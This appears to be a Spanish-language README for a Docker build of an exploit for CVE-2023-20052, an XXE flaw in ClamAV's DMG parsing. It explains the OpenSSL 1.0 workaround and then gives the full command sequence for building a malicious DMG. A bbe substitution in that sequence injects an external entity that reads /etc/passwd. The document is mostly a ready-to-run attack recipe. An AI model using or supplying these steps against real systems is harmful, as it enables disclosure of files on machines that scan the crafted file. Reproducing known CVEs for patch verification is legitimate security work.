
Compilación de Docker corregida para el exploit de CVE-2023-20052 ClamAV XXE. Resuelve errores de compilación de OpenSSL 3.0 usando Ubuntu 18.04 con OpenSSL 1.0 para compatibilidad con libdmg-hfsplus. Genera archivos DMG maliciosos para inyección de entidades externas XML.
Compilación de Docker corregida para CVE-2023-20052 (vulnerabilidad XXE de ClamAV) que realmente compila.
El exploit original no compila en sistemas modernos:
HMAC_CTXdmg/filevault.clibssl1.0-dev (OpenSSL 1.0)libdmg-hfsplus usa funciones obsoletas de OpenSSL 1.0:
HMAC_CTX_init() / HMAC_CTX_cleanup() (eliminadas en OpenSSL 1.1+)HMAC_CTX (opaca en OpenSSL 1.1+)Ubuntu 18.04 es la última LTS con soporte para OpenSSL 1.0.
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .
# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash
# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg